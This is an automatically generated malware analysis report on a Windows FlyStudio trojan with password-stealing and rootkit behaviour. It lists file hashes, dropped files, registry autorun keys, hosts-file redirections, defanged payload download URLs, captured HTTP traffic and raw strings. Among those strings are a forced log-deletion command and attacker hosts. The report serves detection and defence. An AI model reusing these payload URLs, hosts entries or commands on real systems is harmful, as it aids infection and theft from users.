Trojan.Win32.FlyStudio_60883406fe

by malwarelabrobot on February 14th, 2018 in Malware Descriptions.

Gen:Variant.Symmi.77281 (BitDefender), Trojan.Win32.Agent.nfaquv (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.Hosts.41987 (DrWeb), Gen:Variant.Symmi.77281 (B) (Emsisoft), Artemis!60883406FEE1 (McAfee), SecurityRisk.gen1 (Symantec), Trojan.Sisproc (Ikarus), Gen:Variant.Symmi.77281 (FSecure), Win32:Adware-gen [Adw] (AVG), Win32:Adware-gen [Adw] (Avast), TROJ_GEN.R002C0WKL17 (TrendMicro), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR, GenericPhysicalDrive0.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Adware

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 60883406fee1e16d32cf3c9f19b2c572
SHA1: f40ae64d0f7f59fee732ef9c0a86322a48e7ac0d
SHA256: 4a1e1c4f036425147dd45d906d68c66ff97cda9f5f36f65ee3c02a9a7b658b1c
SSDeep: 49152:h63BcmkexincwEoiMdckGzX8x0YiOAirW8KPhISVe9s6Ezj0a/zMyf/8eq Tiq06:wNkex4ONQckmjYiqrRGhI2eCpzH/VzqY
Size: 2692608 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-08-03 20:54:18
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

29c2bf.exe:3248

The Trojan injects its code into the following process(es):

%original file name%.exe:1828
2bcd58.exe:2216

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1828 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\2bcd58.exe (678 bytes)
C:\Windows\29c2bf.exe (506 bytes)

The process 29c2bf.exe:3248 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Temp\1.sys.rar (1994 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\SafeWall[1].rar (2835 bytes)

The process 2bcd58.exe:2216 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\drivers\etc\hosts (826 bytes)

Registry activity

The process 29c2bf.exe:3248 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\System\CurrentControlSet\Control\CrashControl]
"CrashDumpEnabled" = "2"

[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASAPI32]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process 2bcd58.exe:2216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"windowswf" = "C:\Windows\system32\2bcd58.exe"

Dropped PE files

MD5	File path
1e249c45cd2a57640a50bdd840356b66	c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\SafeWall[1].rar
84ce8105f2b3b7ac55b824ecfba670e6	c:\Windows\29c2bf.exe
e25533277b22c9d342ac26cfebb4f9b8	c:\Windows\System32\2bcd58.exe

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 2044 bytes in size. The following strings are added to the hosts file listed below:

23.234.10.41	www.45woool.com
23.234.10.41	www.44woool.com
23.234.10.41	www.zhaowoool.com
23.234.10.41	www.zhaocs.com
23.234.10.41	www.8cs.com
23.234.10.41	www.huocs.com
23.234.10.41	www.fireol.com
23.234.10.41	www.jielesh.com
23.234.10.41	www.woool2017.com
23.234.10.41	www.600sf.com
23.234.10.41	www.xlcomic.com
23.234.10.41	www.021sjjc.com
23.234.10.41	www.45ci.com
23.234.10.41	www.bdtiandao.com
23.234.10.41	www.lke5.com
23.234.10.41	www.45woool.org
23.234.10.41	www.zjlscnc.com
23.234.10.41	www.93u.com
23.234.10.41	www.guanmei2008.com
23.234.10.41	www.dtggc.com
23.234.10.41	www.woool2sf.com
23.234.10.41	www.chinahuaman.com
23.234.10.41	www.176fgcqsf.com
23.234.10.41	shaibar.com
23.234.10.41	www.shaibar.com
23.234.10.41	www.ucwoool.com
23.234.10.41	www.65535cs.com
23.234.10.41	www.quwoool.com
23.234.10.41	www.88woool.com
23.234.10.41	woool.sf999.com
23.234.10.41	www.fhdlq.com
23.234.10.41	www.28pk.com
23.234.10.41	www.ggwoool.com
23.234.10.41	www.wooolsf.com
23.234.10.41	www.5b.com
23.234.10.41	119.145.148.100:6769
23.234.10.41	162.212.181.100:6769
23.234.10.41	192.126.127.100:6769
23.234.10.41	www.xcsf8.com
23.234.10.41	www.xz518.cn
23.234.10.41	cq3.wca.com.cn

Rootkit activity

Using the driver "%System%\SafeWall.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
The Trojan installs the following kernel-mode hooks:

NtDeviceIoControlFile

Propagation

VersionInfo

Company Name:
Product Name:
Product Version: 1.1.0.0
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.1.0.0
File Description:
Comments:
Language: Language Neutral

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
UPX0	4096	1957888	0	0	d41d8cd98f00b204e9800998ecf8427e
UPX1	1961984	2445312	2442240	5.45091	d92a56db59c1b6ac75f6dd1e38c1a16b
.rsrc	4407296	249856	249344	4.74163	364a608418d22be336186b3e104924f6

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://x6.tianyuanfalan.com/Config.rar	139.224.223.3
hxxp://x6.tianyuanfalan.com/SafeWall.rar	139.224.223.3
www.hqkjwy.com	125.77.31.224
teredo.ipv6.microsoft.com

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

GET /Config.rar HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: x6.tianyuanfalan.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: application/octet-stream

Last-Modified: Thu, 13 Jul 2017 07:45:01 GMT

Accept-Ranges: bytes

ETag: "304dfbeeabfbd21:0"

Server: Microsoft-IIS/7.0

X-Powered-By: ASP.NET

Date: Tue, 13 Feb 2018 14:45:33 GMT

Content-Length: 0

HTTP/1.1 200 OK..Content-Type: application/octet-stream..Last-Modified
: Thu, 13 Jul 2017 07:45:01 GMT..Accept-Ranges: bytes..ETag: "304dfbee
abfbd21:0"..Server: Microsoft-IIS/7.0..X-Powered-By: ASP.NET..Date: Tu
e, 13 Feb 2018 14:45:33 GMT..Content-Length: 0......

GET /SafeWall.rar HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: x6.tianyuanfalan.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: application/octet-stream

Last-Modified: Wed, 29 Apr 2015 01:58:16 GMT

Accept-Ranges: bytes

ETag: "0ac3f51f82d01:0"

Server: Microsoft-IIS/7.0

X-Powered-By: ASP.NET

Date: Tue, 13 Feb 2018 14:45:33 GMT

Content-Length: 24112
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...................
..............Y......._.......I.......[.....Rich............PE..L.....
.Z.................(....).....>@*......@...........................
....p*.............................................P@*.<...........
.........J..0....P*.h....@...............................A..@.........
...@...............................text....!......."..................
 ..h.rdata.......@.......&..............@..H.data...x.)..P.......*....
..........@...INIT.........@*..................... ....reloc.......P*.
.....4..............@..B..............................................
......................................................................
......................................................................
......................................................................
......................................................................
..........................................................U..QQSVW.}.j
.3....WS.]..]....@......tqWSV......}..U.......3.O....~....t....:...].t
......A@...;.|..}...~&...t..E..M....:..t.......E.C;].t.9}.|.j.V...@...
.._^[....j.V...@...E. E.........h.........h.R.................U..QSW.}
.W.G8>....Gp.....G@.....~...3.;..E.}.......uV......C...h.).... @..3
......f..R..V..Sf..R.....@..VSP..R........G.....p(h.R.....@..Sh....SSS
S.E.P...@...u....@...E.^_[...........U.....W.M..E...E...E......<.t(
<>t$<6t <&t.<dt.<et.<.t.<.t.<.t.<ft.<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_1828:

`.rsrc

t%SVh

t$(SSh

|$D.tm

~%UVW

t.It It

u$SShe

kernel32.dll

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

oleaut32.dll

EVariantBadIndexError

u%CNu

MaxKeySize

Invalid key size

%UUUU1E

%UUUU3

5 passes)

1.2.3

DB00735E-CFFB-47E6-B060-BB0D74008B7A

94-401@163.com

Bv=kAv.SCv

ws2_32.dll

Kernel32.dll

ntdll.dll

shlwapi.dll

user32.dll

advapi32.dll

psapi.dll

Urlmon.dll

wininet.dll

Wininet.dll

ICMP.DLL

version.dll

GetProcessHeap

MsgWaitForMultipleObjects

GetWindowsDirectoryA

ShellExecuteA

URLDownloadToFileA

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

RegOpenKeyA

RegCloseKey

DeleteUrlCacheEntry

2434595645!

wshom.ocx

WindowStyle

Hotkey

\Data\Config.ini

127.0.0.1

woool.dat.update

hXXp://VVV.hqkjwy.com:88/dlqtj.html

@#%s!

popup.dat

fhdlqxf.txt

Widget.dll

cliqos.dll

Game.ini

GroupNick0

ServerPort

WidgetContent.IE.dll

.rsrc

9=|

5\pUWSSHYzZ

(}9D%F

]CvL,

VQR`"%U;!

.Be$>;

g21r%Wr0/.Wr%W-, %Wr%*)r%Wr('&Wr%W%$#:v

VXX\.BKj

WudP

A.DNE

%SxI8

Uq.NL;(

.UTX@9

.IY\p,

A.tCDo

~_\.Wl

(.eC:

.WPya

`%Ua`

xs.MI!&

Zc#P%c

.kwFt

*.lrR

\.pL.

el32.dll

>6Qt%c

(()@-3$-

},z%C

l  O%cR

.PA5>C0>2

axKey7

eH.Cl

PJ.J.TXJ.J.\`K

XT.J.JPL%J.JH

hsSH>

8-%X<

;44.fB$

.fZNt

DB00735E-CFFB-47E6-60

94(01@163.

%Y]%F]

Acqui.Rf/

MICKEY

AAD.DJ

O.OPP

%d&&'

W%*.*f

2CNotSupported

96.Ae

mu_.fe,g

_DZwMsg

ELECTED4.MSVCRT

,.PAV

'5X%S

*.* G1

(&07-034/)7

.tp#3

%s:%d/=

.Eh.dE^

keyw

?n.NNn

*.yUW

Gl.chs\S

H.Jk

eg1Key

< 3)20,6

O.rsrc

KERNEL32.DLL

ADVAPI32.dll

COMCTL32.dll

comdlg32.dll

GDI32.dll

ole32.dll

OLEAUT32.dll

SHELL32.dll

USER32.dll

WINMM.dll

WINSPOOL.DRV

WS2_32.dll

ReportClientQos

?.mF$

WLBÄ

P.RlN

u.Hs,

%c&px|

5\tUWSSHh

&FtPoq0Hv

#X>.Ptm|t

${E.PH

,H.QB

.Jw'j\Q

0.2A.DNE

"nÎ

!KÀ

~*K.HF

A.tCDH

`@;8x%x

c4 &.ITf

C.kwFt

t]&%uAK

NO.OPK

'&%$$#""!!

W%*.*

gCNotSupported

Resourl

CmdTarf

ECTED4.MSVCRT

B.XPgo

X%Sm'

.*.*o

tH%s<

%s:%d/u%

h.dE7

r.nJg1~_

zcÁ

.r%.hXA

QKey9

.uK97

\ `.ra]

*.exe

hXXp://tianya.bianqian8228.com:789/

.xinchangyang.cn/

hXXp://

20170101

\data\woool.dat.update

.SESj

6]%X[tl}T

k\<Ts<\%SHK

_&NI%Xh0U

f%u9]

%DjLhV

\UWSSHh

 "UDp

(.ni0

\k-.dE

>.Ptm|tc

.QTC!

PBi@.HD

%C$$$

[.LUr

D(.YPW

%X@!L

l(%U4:

jF RSSh6

%CIt#

Çc$

}%U4s

A.tCD

9 .pk

xlÕ7

x S%u' J

.PSad

^}%.x2

h.ly&

.hd\R

6.uL/

SFC.kwFt

x%xD?

<#,user32.dll

6ACC.DLLT

[lzndowPr8AkF.eg

hXXp://w

.hqkjwy.c

C:\WIN

102.54.9

38.25.63.10xyp

/.- *)(''&%$$#""!!

%*.*f

.Arm.

*OCmdT"

..HLP

SVCRTgr

X`hB.trp

.PAVC@@)I

%s:%d)

RIFF%x

1.6.7

.Ehho

!Gl.chs\S-

cKey

UrlA3%

}.mKK;

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>PAD

RASAPI32.dll

WININET.dll

.text

`.rdata

@.data

@.reloc

vSSSh

tGHt.Ht&

FTPjK

FtPj;

C.PjRV

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

GetProcessWindowStation

USER32.DLL

operator

portuguese-brazilian

\\.\%c:

\\.\SafeWall

/c del /f /s /q c:\windows\minidump\*.*

C:\Windows\MEMORY.DMP

cmd.exe

C:\Windows\Temp\1.sys.rar

C:\Windows\Temp\1.key.rar

%s\SafeWall.sys

hXXp://x6.tianyuanfalan.com/SafeWall.rar

C:\Windows\System32\SafeWall.sys

%s\Drivers\SafeWall.sys

hXXp://x6.tianyuanfalan.com/SafeWall64.rar

C:\Windows\SysWOW64\drivers\SafeWall.sys

hXXp://x6.tianyuanfalan.com/sys.rar

%s\Temp\sys.dat

%s\Temp\sys.key

%s\Temp\sys64.dat

%s\Temp\sys64.key

\*.dat

\Drivers\*.sys

\temp\Config.dat

hXXp://x6.tianyuanfalan.com/Config.rar

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

C:\Users\Blackeyes\Documents\Visual Studio 2008\Projects\Phoenixer\Release\Phoenixer.pdb

KERNEL32.dll

ExitWindowsEx

RegDeleteKeyA

RegOpenKeyExA

urlmon.dll

imagehlp.dll

PSAPI.DLL

GetCPInfo

GetConsoleOutputCP

h.rdata

H.data

.reloc

pk.fujianhuafeng.com

hXXp://pk.fujianhuafeng.com:88

ECInf->Key%x

Hash%x

ECInf->FileBufferLen%d

119.145.148.

162.212.181.

192.126.127.

125.88.181.

183.60.200.

45woool.com

44woool.com

zhaowoool.com

zhaocs.com

huocs.com

fireol.com

8cs.com

jielesh.com

woool2017.com

600sf.com

xlcomic.com

021sjjc.com

45ci.com

bdtiandao.com

lke5.com

45woool.org

zjlscnc.com

guanmei2008.com

dtggc.com

93u.com

woool2sf.com

chinahuaman.com

176fgcqsf.com

shaibar.com

ucwoool.com

65535cs.com

quwoool.com

88woool.com

sf999.com

fhdlq.com

28pk.com

ggwoool.com

wooolsf.com

5b.com

HTTP/1.1 301 Found

Location: %s

c:\safewall\safewall_x86\objfre_win7_x86\i386\SafeWall.pdb

KeDelayExecutionThread

ZwDeleteKey

ZwOpenKey

ntoskrnl.exe

KeStallExecutionProcessor

HAL.dll

.pdata

Hash %x

ECInf->Key %x

ECInf->BB %x

in line:%d

c:\safewall\safewall_amd64\fucksys.c

at file:%s

c:\safewall\safewall_amd64\objfre_win7_amd64\amd64\SafeWall64.pdb

2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,

/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D

hXXps://VVV.verisign.com/rpa0

hXXp://ocsp.verisign.com0;

/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0

<VeriSign Class 3 Public Primary Certification Authority - G50

DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0

hXXps://VVV.verisign.com/cps0*

#hXXp://logo.verisign.com/vslogo.gif04

#hXXp://crl.verisign.com/pca3-g5.crl04

hXXp://ocsp.verisign.com0

<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>

6#6-6;6{6

: :<:@:\:`:

hXXp://VVV.360.cn/superaid/index.html

fhdlqxf.exe

%s\Drivers\UnlockCallback_x64.sys

C:\Windows\SysWOW64\drivers\UnlockCallback_x64.sys

%s\Drivers\UnlockCallback.sys

C:\Windows\System32\drivers\UnlockCallback.sys

c:\Windows\fhdlqxf.txt

C:\Users\Blackeyes\Documents\Visual Studio 2008\Projects\PassPhoenix\Release\PassPhoenix.pdb

CertGetNameStringA

CryptMsgGetParam

CertFindCertificateInStore

CertFreeCertificateContext

CertCloseStore

CryptMsgClose

CRYPT32.dll

MSVCR90.dll

_amsg_exit

_acmdln

_crt_debugger_hook

c:\users\dumingqiao\desktop\source\objfre_win7_x86\i386\EnumRemoveCmpCallback.pdb

7%7U7

c:\users\dumingqiao\desktop\source\objfre_win7_amd64\amd64\EnumRemoveCallback.pdb

<assemblyIdentity type="win32" name="Microsoft.VC90.CRT" version="9.0.21022.8" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>

2"2(2.242:2@2

Software\chuanshi\web

\Data\config\ItemCfg.INI

\Data\config\default\bestitem.INI

https

Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

http=

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

hXXps://

hXXp://VVV.hqkjwy.com:88/h.txt

116.211.24.226

vreport

windows

Battle.net

$Recycle.Bin

data\woool.dat.update

Software\Microsoft\Windows\ShellNoRoam\MUICache

\0-49-3d.nmp

dWEbo

úG0

n#e.jzPxt

.Dt[:js

U#y.aPKwH

]4O%UMp&

2cpÞ

g^.Lt

=.Rx>/

V=.ev&2

.WKM\-

t%DkT

.rO@]

V.rP?

CE.rC

.NaEb

.qPzM

.oKty[

M.nN-H

fB%s:

Q~(%c

8.Ww4

P.Dy4

" .eXqit

Yh2%Ud

S.jLu

V\jiangjunling01.nmp

\jiangjunling02.nmp

Oi%xK_<

^t%dk

-d}Gt

3s4%U

\wuxing.nmp

%sBdN

%sJdN

:1975/08/21

Http://

Adobe Photoshop CS2 Windows

2011:12:22 11:54:23

urlTEXT

MsgeTEXT

hXXp://ns.adobe.com/xap/1.0/

<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="3.1.1-111">

<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">

xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">

xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/">

xmlns:xap="hXXp://ns.adobe.com/xap/1.0/">

<xap:CreatorTool>Adobe Photoshop CS2 Windows</xap:CreatorTool>

xmlns:xapMM="hXXp://ns.adobe.com/xap/1.0/mm/"

xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#">

<stRef:documentID>adobe:docid:photoshop:4de4def4-ecd0-11e0-9a10-a9350357c235</stRef:documentID>

xmlns:dc="hXXp://purl.org/dc/elements/1.1/">

xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/">

IEC hXXp://VVV.iec.ch

.IEC 61966-2.1 Default RGB colour space - sRGB

CRT curv

.fM,k

.kp:S

?idWF.fE

-0 /2#25"27$6;#7>"7?#=C$@F&CJ*FM-IP0JQ/KQ1MS1NT4PW3OV4PW6RY7SZ8T[6Q[7SZ8TZ7SZ7SZ5QW4QT5QW4OY3PW4QX3PW3PW3PW3PW4QX4PW4PV7SY7SZ6RY7SZ7SZ6RY7SZ8SV4PV3PW2OV4PW5QX4PW3OV3PW4PW3OV5PZ2OV4PW6RX6SZ9SY7SZ7SZ8T[6SY8TZ4PV4PV4PW4PZ4PZ3OY3OY3PW3OY5PZ4NZ5PZ4OY4OY5PZ4OY5QX7SZ:UX7SY7SZ7SZ7SY7SZ6RY-IS4RU4OY:TZ.JT

 .Zv|Qkw

-2#16"27$49"6=$9@$>D&@F(DK)EL,HO-IP0KU2MW3OV3OV3OV5QX6RX7SY7SY7SZ8S]7SZ7SY8TZ3OU5QX4PV4PV1QV0PU3PV4QW2OV3PW1NU4QX3OV7SZ5QX7SZ7SZ6RY8T[6RY7SY3OU5QW4PW4PV5QW5RX3PV4PW6RY3OV5QX4PW3OV7SZ7SZ8T[5QW8U[8TZ5RX6SY4QW3PW3PW5QX3OV5QX4PW5QX5QW4PV3QT3PV3PV3PW5QX3OV5QX6RY7SY7SZ7SZ7SZ8T[9U\8RY0JQ6N[.PV9R\-HT

-2!16"27$49"6=%9@$>E$@G(DK)DN*FP-IS/JT3NX4PW3OV3OV4PW6RY7SZ7SZ7SZ8T[7SY5RX8TZ3OU5QW4PW4PV0PV/OT4QW4QW1NU5RY1NU4QX4PW7SZ6RY6RY7SZ6RY8T[7SZ8T[2NU5QX3OV4PV5QW4RU2PS4PW6RY3OV5QX4PW3OV7SZ7SZ8T[5QW8U[8TZ5RX6SY4QW3PW3PW5QX3OV5QX4PW5QX5QW4PV3PV3PV3PV3PW4PW5QX5QX6RY7SY7SZ7SZ7SZ8T[9U\8RY0JQ6N[.PV9R\-HT

###$$$"""$$$&&&

!!! !!! """ """###!!!

|||___^^^"""

...---,,,---   ,,,,,,,,,......---...,,,---...---///...111...000222000///...000HHHJJJEEEDDD444,,,   111.........111000>>>EEEEEE???444......111   ///???EEEGGGEEE555000000.........111111000---///BBBFFFCCCEEE555000   ,,,,,,...444<<<BBBGGGAAA...------...---///111...---EEEKKKMMMOOO888/////////---   ///000...111   000///***///---,,,///,,,...KKKKKKMMMCCC???333   ***---,,,,,,------...///..................---------//////------///***,,,,,,FFF&&&

???<<<222444555666

777666333777

@@@<<<333888666555

999???@@@???>>>@@@

%%%XXXXXXXXXLLL

...RRR]]]^^^\\\\\\___^^^JJJ

999888666444

888999000

!!!999;;;===:::)))

...vvv

[[[(((&&&|||

]]]___"""

###$$$%%%$$$%%%

 / /2"14"36i&8=$8@%<D'@J'BL)DN,HO.JQ/KR1MT1MW2OV2OV3PW7SZ7SZ7SZ6RY7SY7SY7SY7SY4PW5QX4PW4PW4PW4PW4PW4PW4PW5QX4PW4PW5PZ7R\9SZ9SY9SY9SY7SY7SZ9SY4PW3OY5RY4PW3OV4OY4PZ4OY6PW4PW4PW5QX4PV6RX7SY7SY7SY7SZ7SZ7SZ7SZ4PW5QX4PW5QW4PV4PV5QX3PW4PW7QX4OY5PZ4OY5PZ4PW4PW4PW6RY9SY7SZ7SZ6RY9SY:T[6RY/KU3PW4PZ9SY/KR

05!38#5:%7<&8=%<D&@G*DK*FM,HO.JQ0KU1LV2NU3OV3OV4PW7SY7SY7SY7SZ:T[9SZ6RY8T[3PW5QX4PW4PW5QX4PW4PW4PW4PW4PW4PW4PW5QX7SZ7SZ7SZ7SZ7SZ7SZ7SZ5T]4PZ4OY6OY4OY4OY3PW1QW3NZ3NZ3NZ3NZ3NZ3NZ6Q]7R^9SZ7QX9R\:T[6RY7SZ3NX4OY3OV4PW4PW4PW4PW5QX4PW3PV3PW4QX3OY4OY4OY3NX4PW7SZ9U[6RY7SZ8T[8T[6RY8T[.JQ4QW4PW9TW/JT

)0.JQ 7?Dbm

}}}|||~~~

,,,!!!???...XXX

   ...rrr

......,,,---,,,---------...000......---///...---/////////////////////000...DDDFFFFFFGGG---IIICCCBBB>>>777444...//////000111///222,,,///000......///000555///000000HHHIII<<<000.../////////000...///000   :::FFF777   ,,,......666<<<BBBIII===///------...   ///---...---EEEKKKMMMMMM666000///...---...///111///...---222......,,,,,,000000------JJJKKKNNNFFFAAA111---))),,,,,,...---......///.........///...---,,,,,,---...111,,,,,,000   ,,,,,,EEE&&&

>>>===444555444666

SSSHHH"""

---444333555444

>>>999444666555444

...555:::444666:::

000:::888999:::888<<<888

???@@@===///

...NNN;;;;;;<<<<<<<<<<<<<<<<<<<<<======<<<:::===<<<===>>>===???===>>>===999<<<<<<EEE'''

...SSSGGG))) !!!

...lll!!!

;;;777000

:::999888999

...jjjlllnnnkkklllkkklllnnnjjjnnnkkklllmmmnnnjjj

###%%%###$$$%%%

|||{{{|||}}}~~~|||~~~

!!!###***

@@@```~~~

999(((555>>>

111""">>>$$$

888///,,,

111...///

;;;---111

(((444((()))

EEE444111111...LLL

333   ---   ...OOO

"""'))***$$$

$$$***)))555999)))%%%

222:::888555666[[[

%''(%'$#%

$'#(&&%&(

!!!###$$$(((&&&

"""'''((("""

"""'''   """

$$$%%%'''%%% ###(((***$$$ )))...!!!

!!!888...;;;

!!!&&&!!!

&&&   (((,,,   ,,,)))%%%""" $$$

"""&&&$$$###$$$'''&&&!!!

$$$   ,,,((($$$   &&&

!!!'''"""

$$$'''&&&### %%%$$$

"""'''***'''&&&   $$$

###&&&%%% %%%(((***$$$!!!%%%

'''...111 ###

&&& &"*(('''$$$'''"""

$$$###"""%%%)))'''###)))111555444333

###%%% !!!$$$..."""(((&&&

%%D4111

%!"%"(((###"""###!!!

"""...((($$$&&&'''"""

 (*3.1./1346$!%

)))$$$&&&(((%%%

,,,((( ((()))!!!

&&&'''&&&!!!

###(((   %%%"""

###---***!!!

''',,,"""

222^^^%%%

%%%!!!###%%%$$$

""")))&&& ###

   """ $$$)))%%%((()))!!!

!!!$$$'''###

*&'(((&&&'''%%%$$$"""

)))""" !!!&&&###

$$$%%%&&&"""

!!!'''&&&###%%%

,,,%%% ###!!!"""

###'''"""

"""'''$$$ ###

''')))***,,,)))!!!&&&

$&&&%'&$$'''

%%f6   ***$$$!!!###!!!

#"&'&((&&!&%'%%,**###"""###!!!

! # "#!!!

$),)""" $$$!!!

"""'''&&&

%%%..."""

FFF???)))<<<;;;...EEEKKK999TTT```,,,

(((...CCCmmmdddddd222

'''(((''''&(!$!!"

###$$$"""

~~~```@@@

'''666''')))

000@@@~~~

)))***"""

'''.00,**)))%##

. )022230...'))

-&  ""!#

"'()(%!"$

###'''(((###

$$$%%%'''%%% ###(((***$$$ )))...!!!

$$$(((&&&)))---   ((($$$ &&&###

&&&***(((,,,   ,,,)))%%%""" $$$

*=@%CO

!'#$&&&$&&'''$$$'''"""

***55589=866

" !#%&"(((###"""###!!!

"""!!!%%%'''

'&(((('''&&&%%%###"""

!!!###%%%'''(((&&&$$$!!!$$$)))&&&###%%%'''###"""$$$!!!

%##%&#(((#%%&'$

$&&%$&(%#"($   ###"""###!!!

" () """ $$$!!!

'&()(%&')%%%%"$

---   ***___

888!!!888%%%...PPP

999'''555>>>

111"""===%%%

999///,,,

(((666((()))

'''000   )))$$$

---000222...)))

...qqq???

###((("""

!!!111!!!

!!!###%%%'''&&&

...;;;|||

"""''',,,"""

""")))***!!!

